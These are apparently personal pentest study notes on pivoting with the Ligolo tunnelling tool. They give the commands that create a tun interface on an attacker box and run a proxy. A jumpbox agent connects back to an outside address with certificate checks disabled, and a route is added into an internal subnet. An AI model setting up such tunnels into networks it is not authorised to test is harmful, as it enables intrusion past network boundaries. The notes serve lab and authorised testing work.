Skip to content

Ligolo

  • proxy and agent files
  • we have to enter the internal network using the pivot box/jumpbox
  • Ligolo uses TLS certificates for encrypting the tunnel - -autocert
  • this might need internet connection for certificate verification. In real pentests.
  • If we dont have an internet connection, we can add our manually created certificate
  • OR use -selfcert on ligolo-proxy
    • Not recommended as might be privy to mitm
  • use -ignore-ceert on ligolo-agent
    • Use in testing env for debugging

Workflow:

  • Setup a tunnel interface/device for ligolo - PWNBOX
  • sudo ip tuntap add user kali mode tun ligolo
  • sudo ip link set ligolo up
  • Confirm if the ligolo interface is created: (might show DOWN)
    • ifconfig ligolo
    • ip addr show ligolo
  • Run the ligolo-proxy from PWNBOX
  • ./ligolo-proxy -selfcert
    • waiting for connections now
  • Run the ligolo-agent from the JUMPBOX
  • /ligolo-agent -connect 10.10.14.7:11601 -ignore-cert
  • In ligolo-proxy on PWBOX
  • we see a connection received message
  • session
    • and select the session
  • ifconfig
    • find the network subnet we want to tunnel into (eg: 10.1.2.5/24)
  • Add a route - in PWNBox
  • sudo ip route add 10.1.2.0/24 dev ligolo
  • In ligolo-proxy on PWNBox
  • start
  • on PwnBox terminal
  • ping 10.1.2.4
  • run any command on the internal ip without the need for proxychains *